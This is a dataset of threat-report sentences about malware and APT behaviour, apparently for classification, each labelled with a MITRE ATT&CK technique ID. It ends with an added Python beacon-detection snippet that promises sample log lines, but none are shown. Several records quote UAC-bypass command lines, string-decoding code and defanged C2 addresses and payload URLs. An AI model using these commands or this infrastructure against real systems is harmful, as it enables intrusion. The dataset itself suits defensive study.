{"text1":"Low confidence generally means that the information's credibility and\/or plausibility is questionable, or that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems with the sources","labels":"['T1082']"}
|
|
{"text1":"The verb get can be used in a myriad of ways to retrieve information for a machine, however in this case os get \/format: is being abused to download payloads from non-local resources with .xsl extensions","labels":"['T1082']"}
|
|
{"text1":"Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities","labels":"['T1082']"}
|
|
{"text1":"itwm= ags= oe= aq= btnG= oprnd= itwm= utm= channel= The XAgent OSX Trojan generates a system specific value that it refers to as an \u201cagent_id\u201d, which is a unique identifier for each compromised host","labels":"['T1082']"}
|
|
{"text1":"The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the \u201cHardware UUID\u201d listed in the system information application, as seen in the Figure 3 screenshot of our analysis system","labels":"['T1082']"}
|
|
{"text1":"The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was \u201c0000\u201d","labels":"['T1082']"}
|
|
{"text1":"The payload sends system information about the infected computer to the C&C server and downloads additional tools.","labels":"['T1082']"}
|
|
{"text1":"If it is successful then it will send out basic host information and await further commands.","labels":"['T1082']"}
|
|
{"text1":"After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"Operating system's name (i.e., the name of the machine) Operating system's OS architecture Operating system's caption Computer system's domain Computer system's username Computer's public IP address","labels":"['T1082']"}
|
|
{"text1":"Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services.","labels":"['T1082']"}
|
|
{"text1":"(To bypass UAC) configurable setting for the process to abuse Other than these, new coding algorithm has been introduced","labels":"['T1548.002']"}
|
|
{"text1":"This request is followed by a call to \u201cGetisrunasAbById\u201d to determine if the Trojan should use \u201crunas\u201d to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click","labels":"['T1548.002']"}
|
|
{"text1":"The CAB file contains the following files and functions: dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass)","labels":"['T1548.002']"}
|
|
{"text1":"The macro then extracts the CAB file into %systemroo%\\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) Command lines used by the Visual Basic macro: cmd \/c wusa %TEMP%\\setup.cab \/quiet \/extract:%SystemRoot%\\System32 && del \/f \/q %TEMP%\\setup.cab && cliconfg.exe cmd \/c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32 && del \/f \/q %TEMP%\\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows","labels":"['T1548.002']"}
|
|
{"text1":"The key differences in this variant: Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll) exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS","labels":"['T1548.002']"}
|
|
{"text1":"Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself","labels":"['T1124']"}
|
|
{"text1":"Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code","labels":"['T1124']"}
|
|
{"text1":"These four were then all modified on the same date and time on October 13, 2018 08:21","labels":"['T1124']"}
|
|
{"text1":"A possible explanation for this is that the document was copied to another system with an incorrectly set system time, then saved with the incorrect time","labels":"['T1124']"}
|
|
{"text1":"When the backdoor establishes a connection to the command and control server, it sets the request period time equal to the specified dwell time for the standby mode","labels":"['T1124']"}
|
|
{"text1":"If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period","labels":"['T1124']"}
|
|
{"text1":"This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode","labels":"['T1124']"}
|
|
{"text1":"Timezone Check The Trojan check to see if the system is configured (\u201cDaylightName\u201d) with one of the following time zones: \u00a0 Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) Human Interaction Check Before executing its functional code, the Trojan presents a dialog box with the following line of code: \u00a0 Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3), MsgBoxStyle.Critical, null); \u00a0 This dialog box displays \u00a0An error occurred while processing user32.dll!, which the user must click the ok button for the Trojan to run its functional code","labels":"['T1124']"}
|
|
{"text1":"Figure 3 Countries in which OopsIE will run in based on the time zone Notable Differences The OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant discussed in our previous blog","labels":"['T1124']"}
|
|
{"text1":"In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn\u2019t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application","labels":"['T1124']"}
|
|
{"text1":"Watches uninstall time, checks time diff (local time vs internet time)","labels":"['T1124']"}
|
|
{"text1":"Here\u2019s a python code to decode","labels":"['T1140']"}
|
|
{"text1":"It then downloads and decrypts a PNG file","labels":"['T1140']"}
|
|
{"text1":"The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file","labels":"['T1140']"}
|
|
{"text1":"Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502","labels":"['T1140']"}
|
|
{"text1":"Once decrypted, we are provided with a large list of strings, as seen below (note that the data has been truncated for brevity): Figure 12 Decrypted strings from embedded BMP file After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on","labels":"['T1140']"}
|
|
{"text1":"In order to decode this data, Comnie first decodes it using base64 with the following non-standard alphabet (note that it is simply the original alphabet in reverse): \/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA \u00a0 The resulting data is then parsed and decrypted using RC4","labels":"['T1140']"}
|
|
{"text1":"This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence","labels":"['T1140']"}
|
|
{"text1":"Its purpose is to load Msadoz<n>.dll in order to decrypt and execute it in memory","labels":"['T1140']"}
|
|
{"text1":"If after the package has been decoded its size is bigger than 3 bytes, the Trojan decrypts its first 11 bytes with XOR using the method similar to the one described above","labels":"['T1140']"}
|
|
{"text1":"The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory","labels":"['T1140']"}
|
|
{"text1":"Configuration Decryption: Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration","labels":"['T1140']"}
|
|
{"text1":"Figure 2 \u2013 The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker","labels":"['T1140']"}
|
|
{"text1":"It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks","labels":"['T1140']"}
|
|
{"text1":"Packet::getData decrypts the received payload and Converter::outString descrambles the result","labels":"['T1140']"}
|
|
{"text1":"In the event this is successful the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\\services\\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\\microsoft\\mmc\\ It proceeds to load and decrypt and embedded bitmap resource file","labels":"['T1140']"}
|
|
{"text1":"In the event this is successful, the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\\services\\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\\microsoft\\mmc\\ Reaver.v2 proceeds to decrypt an embedded file using a simple XOR obfuscation routine","labels":"['T1140']"}
|
|
{"text1":"ESET\u2019s analysis of a recent backdoor used by TeleBots \u2013 the group behind the massive NotPetya ransomware outbreak \u2013 uncovers strong code similarities to the Industroyer main backdoor, revealing a rumored connection that was not previously proven The post New TeleBots backdoor: First evidence linking Industroyer to NotPetya appeared first on WeLiveSecurity","labels":"['T1140']"}
|
|
{"text1":"The following code snippet was used to decode strings within OopsIE:out = \"\" for e in obfuscated_string.split(\"-\"): out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section","labels":"['T1140']"}
|
|
{"text1":"This exception invokes the exception handler containing the HTTP communication code, allowing it to run","labels":"['T1140']"}
|
|
{"text1":"Figure 1 \u2013 The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread","labels":"['T1140']"}
|
|
{"text1":"The first shellcode decrypts a further shellcode block","labels":"['T1140']"}
|
|
{"text1":"After decrypting the strings, they must be further decompressed using LZNT1","labels":"['T1140']"}
|
|
{"text1":"It then reads and decrypts the content between these values to yield an IP address as shown below: ---- BEGIN SSH2 PUBLIC KEY ----Comment: \"rsa-key\"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt\/WknQK9CDLWubpgknZ0HIHSd8uV\/TJvLsRkjpV+U\/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv\/mJjQ9Lv3BdNiM3\/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv\/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q\/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ---- A Python script to decode strings encrypted with this technique is given in Appendix B \u2013 Python Scripts","labels":"['T1140']"}
|
|
{"text1":"Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document","labels":"['T1140']"}
|
|
{"text1":"The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute","labels":"['T1140']"}
|
|
{"text1":"The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string","labels":"['T1140']"}
|
|
{"text1":"We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one","labels":"['T1140']"}
|
|
{"text1":"\u201cKnock\u201d also appears in several strings inside the code of SpeakUp","labels":"['T1140']"}
|
|
{"text1":"It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn\u2019t exposed until runtime","labels":"['T1140']"}
|
|
{"text1":"In total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique decoy documents","labels":"['T1140']"}
|
|
{"text1":"In this particular instance, the payload is encoded via base64, which certutil decodes","labels":"['T1140']"}
|
|
{"text1":"The following function written in Python may be used to decode this file:def decode(data): \tout = \"\" \tc = 0 \tfor d in data: \t\tout += chr(ord(d)^c) \t\tc+=1 \treturn outOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on port 7117","labels":"['T1140']"}
|
|
{"text1":"The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: \u00a0int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { <legitimate Sales System Application code> } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task","labels":"['T1140']"}
|
|
{"text1":"(Source: Dell SecureWorks) Both the redirect code on the compromised site and the exploit code appear and disappear, indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations","labels":"['T1140']"}
|
|
{"text1":"The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers","labels":"['T1140']"}
|
|
{"text1":"The image and table below illustrate TClient\u2019s encrypted configuration that we decrypted (via Python code): Figure 10","labels":"['T1140']"}
|
|
{"text1":"Decrypted backdoor configuration Reverse analysis of TClient allowed us to determine how to decrypt the C&C information","labels":"['T1140']"}
|
|
{"text1":"Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"These parameters install it as a service","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"The malware operates on victims\u2019 systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"The malicious DLL is not a service DLL because it lacks ServiceMain()","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"The victims Data from Cadelle\u2019s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"The document brought Talos a new gift - a new version of ROKRAT","labels":"['T1543', 'T1543.003']"}
|
|
{"text1":"It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file","labels":"['T1105']"}
|
|
{"text1":"The directory creation.\u00a0 Downloading the Payloads The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files","labels":"['T1105']"}
|
|
{"text1":"A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018.\u00a0 The script verifies all parts of the malware have been downloaded.\u00a0 After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded.\u00a0 One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth.\u00a0 The twelve downloaded files","labels":"['T1105']"}
|
|
{"text1":"Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server","labels":"['T1105']"}
|
|
{"text1":"One of the discovered config files contained a URL with an as yet unidentified md5: hxxps:\/\/46.165.222(dot)28\/upgrade\/bf0dac805798cc1f633f19ce8ed6382f\/upgrade.php Victim set #4 A set of victims discovered\u00a0installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy","labels":"['T1105']"}
|
|
{"text1":"HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically \u201cCommand\u201d, \u201cExplorer\u201d, \u201cUpload\u201d, \u201cDownload\u201d, \u201cSql Server\u201d and \u201cChange Time\u201d","labels":"['T1105']"}
|
|
{"text1":"Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems","labels":"['T1105']"}
|
|
{"text1":"The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server","labels":"['T1105']"}
|
|
{"text1":"Symantec determined a more accurate picture of Buckeye\u2019s targets by looking at where Buckeye remained active on the network longer than a day, deployed additional tools, and spread onto multiple computers","labels":"['T1105']"}
|
|
{"text1":"The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download\/upload jobs, mostly to update the OS itself","labels":"['T1105']"}
|
|
{"text1":"It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files","labels":"['T1105']"}
|
|
{"text1":"In this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account","labels":"['T1105']"}
|
|
{"text1":"Upon execution, the initialized file downloads multiple malicious payloads from remote servers","labels":"['T1105']"}
|
|
{"text1":"Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session","labels":"['T1105']"}
|
|
{"text1":"If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded","labels":"['T1105']"}
|
|
{"text1":"attachedTemplate.dotm xxx 11\/15\/18 05:35 11\/15\/18 05:35 109.248.148[.]42 Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates from four C2 servers at the following IP addresses: 185.203.118[.]198 145.249.105[.]165 188.241.58[.]170\u00a0 109.248.148[.]42 These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves","labels":"['T1105']"}
|
|
{"text1":"The POSHSPY backdoor is designed to download and execute additional PowerShell code and Windows binaries","labels":"['T1105']"}
|
|
{"text1":"The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc","labels":"['T1105']"}
|
|
{"text1":"The link provided in the malicious email led to a fake\u00a0VPN Web Portal: Upon logging in with the credentials provided in the email, the victim is presented with the following page: The victim is asked to install the \u201cVPN Client\u201d (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)","labels":"['T1105']"}
|
|
{"text1":"This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.Similar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:hxxp:\/\/60chicken[.]co[.]kr\/wysiwyg\/PEG_temp\/logo1.pngThe fake image usage is a common pattern for this group","labels":"['T1105']"}
|
|
{"text1":"The macro contains malicious code that attempts to download content from a remote server","labels":"['T1105']"}
|
|
{"text1":"!DWN Downloads a file from a specified URL","labels":"['T1105']"}
|
|
{"text1":"The IRC variant of MPK has a command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system","labels":"['T1105']"}
|
|
{"text1":"The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3)","labels":"['T1105']"}
|
|
{"text1":"Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4)","labels":"['T1105']"}
|
|
{"text1":"Figure 8 shows the network communication of the Pause.ps1 download","labels":"['T1105']"}
|
|
{"text1":"I download my tools from GitHub, and so do my victims","labels":"['T1105']"}
|
|
{"text1":"The \u201cupload\u201d command downloads files from the CnC and saves them locally in \u201cC:\\ProgramData\u201c","labels":"['T1105']"}
|
|
{"text1":"Additional information In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers\u2019 arsenal but also some OPSEC mistakes made by the attackers","labels":"['T1105']"}
|
|
{"text1":"It will: Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet Open a decoy document (described later) Close the Terminal window that just opened The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now","labels":"['T1105']"}
|
|
{"text1":"This file issued a GET request to download a malicious file from: hxxp:\/\/94.23.172.164\/dupdatechecker.doc","labels":"['T1105']"}
|
|
{"text1":"The .iqy files take advantage of Excel\u2019s willingness to download and include the contents from a remote server in a spreadsheet","labels":"['T1105']"}
|
|
{"text1":"Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes","labels":"['T1105']"}
|
|
{"text1":"13 Copy file to adbFle.tmp, and upload it to the C2","labels":"['T1105']"}
|
|
{"text1":"Both responses instruct the malware to download and load a remote plugin","labels":"['T1105']"}
|
|
{"text1":"During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample","labels":"['T1105']"}
|
|
{"text1":"The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT","labels":"['T1105']"}
|
|
{"text1":"NavRAT is able to download and execute files located in the attachment of a received email","labels":"['T1105']"}
|
|
{"text1":"Figure 2 SYSCON network traffic witnessed during execution \u00a0 Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family","labels":"['T1105']"}
|
|
{"text1":"CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine","labels":"['T1105']"}
|
|
{"text1":"Delivery document The delivery document contains a macro that downloads an executable from a remote server","labels":"['T1105']"}
|
|
{"text1":"Command_Down_exec: This command downloads and executes new modules.\u00a0 It takes a url as the argument and uses that to download and execute files","labels":"['T1105']"}
|
|
{"text1":"Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes","labels":"['T1105']"}
|
|
{"text1":"After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used","labels":"['T1105']"}
|
|
{"text1":"The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1105']"}
|
|
{"text1":"The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection","labels":"['T1105']"}
|
|
{"text1":"We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server.","labels":"['T1105']"}
|
|
{"text1":"certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm","labels":"['T1105']"}
|
|
{"text1":"The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables","labels":"['T1105']"}
|
|
{"text1":"The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.","labels":"['T1105']"}
|
|
{"text1":"BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it","labels":"['T1574.001']"}
|
|
{"text1":"This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process","labels":"['T1574.001']"}
|
|
{"text1":"Whitefly has consistently used a technique known as search order hijacking to run Vcrodat.","labels":"['T1574.001']"}
|
|
{"text1":"Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it.","labels":"['T1574.001']"}
|
|
{"text1":"Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer.","labels":"['T1574.001']"}
|
|
{"text1":"We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk","labels":"['T1071']"}
|
|
{"text1":"And, according to the collected config files, the group upgraded their malware communications\u00a0from plain text http to encrypted https in\u00a0October 2013","labels":"['T1071']"}
|
|
{"text1":"Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it Figure 2: Configuration file that adds TCP tunnels and records desktop video Command and Control CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol","labels":"['T1071']"}
|
|
{"text1":"The example C2s used by older variants of Comnie demonstrates this: Figure 9 Old Comnie variants collecting C2 information Please refer to the Appendix for a script that may be used to decode C2 information from the older Comnie variants","labels":"['T1071']"}
|
|
{"text1":"The URIs used in the HTTP requests are randomly generated","labels":"['T1071']"}
|
|
{"text1":"Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types","labels":"['T1071']"}
|
|
{"text1":"Figure 2 Code that issues DNS query to gogle.co if a debugger is detected All DNS requests issued by RogueRobin use the built in nslookup.exe application to communicate to the C2 server and the Trojan will use a variety of regular expressions to extract data from the DNS response","labels":"['T1071']"}
|
|
{"text1":"Character Digit h 0 i 1 j 2 k 3 l 4 m 5 n 6 o 7 p 8 q 9 Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands","labels":"['T1071']"}
|
|
{"text1":"The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests","labels":"['T1071']"}
|
|
{"text1":"Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server","labels":"['T1071']"}
|
|
{"text1":"Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server","labels":"['T1071']"}
|
|
{"text1":"11\/1\/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at]post.cz, but all previous samples of Cannon used sym777.g[at]post.cz","labels":"['T1071']"}
|
|
{"text1":"Even though Delphi Cannon uses POP3S and SMTPS for its C2 communications like Cannon, it is arguably easier to defend against as it uses an actor owned domain that defenders can easily block and not a legitimate email provider such as Seznam","labels":"['T1071']"}
|
|
{"text1":"The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28\u2026) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6\u2026) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email","labels":"['T1071']"}
|
|
{"text1":"The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode","labels":"['T1071']"}
|
|
{"text1":"Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4","labels":"['T1071']"}
|
|
{"text1":"The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL: http:\/\/www7.chrome-up[.]date\/0m5EE We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload","labels":"['T1071']"}
|
|
{"text1":"Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as: As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request","labels":"['T1071']"}
|
|
{"text1":"Table 3: FELIXROOT backdoor parameters Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol","labels":"['T1071']"}
|
|
{"text1":"http:\/\/www.cankayasrc[.]com\/style\/js\/main.php http:\/\/ektamservis[.]com\/includes\/main.php http:\/\/gtme[.]ae\/font-awesome\/css\/main.php Recommendations for organizations Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems","labels":"['T1071']"}
|
|
{"text1":"This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP","labels":"['T1071']"}
|
|
{"text1":"tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]\/\/a[.]pomf[.]cat\/http[:]\/\/pomf[.]cat\/upload[.]php","labels":"['T1071']"}
|
|
{"text1":"The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: <current process id>.<c2 domain> The C2 server will provide the system specific identifier within the answer portion of the DNS response","labels":"['T1071']"}
|
|
{"text1":"This command will automatically set the DNS type to use for actual C2 $showconfig Uploads the current configuration of the payload to the C2 slpx:\\d+ Sets the sleep interval between outbound DNS requests $fileUpload Downloads contents from the C2 server and writes them to a specified file Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s","labels":"['T1071']"}
|
|
{"text1":"If that HTTPS request is not successful, the downloader will issue an HTTP request","labels":"['T1071']"}
|
|
{"text1":"Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications","labels":"['T1071']"}
|
|
{"text1":"The payload will construct a message that has the following structure that it will then send to the C2: \u00a0 bye<char uuid[35]>d \u00a0 The message above is sent via a simple HTTPS\/HTTP POST request to the C2 server","labels":"['T1071']"}
|
|
{"text1":"As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http:\/\/<c2 domain>\/chk?<hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run","labels":"['T1071']"}
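The beacon shape above, worked through as an added detection example rather than code from the report: the function decodes the hex query of a /chk request back into the Environment.UserName/Environment.MachineName pair and runs over a few constructed proxy log lines. The report only gives the URL structure; that hex() is a plain byte-wise hex encoding of the ASCII string, the log layout, the client addresses and the domain names are assumptions made for the example.

```python
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

HEX_RE = re.compile(r"[0-9A-Fa-f]+")


def decode_chk_beacon(url: str) -> Optional[Tuple[str, str]]:
    """Return (username, machinename) when the URL has the /chk?<hex> beacon shape.
    The query is a bare hex string rather than key=value pairs, so it is taken whole."""
    parts = urlsplit(url)
    query = parts.query
    if parts.path != "/chk" or not query:
        return None
    if len(query) % 2 or not HEX_RE.fullmatch(query):
        return None
    try:
        text = binascii.unhexlify(query).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, host = text.partition("/")
    if not sep or not user or not host:
        return None
    return user, host


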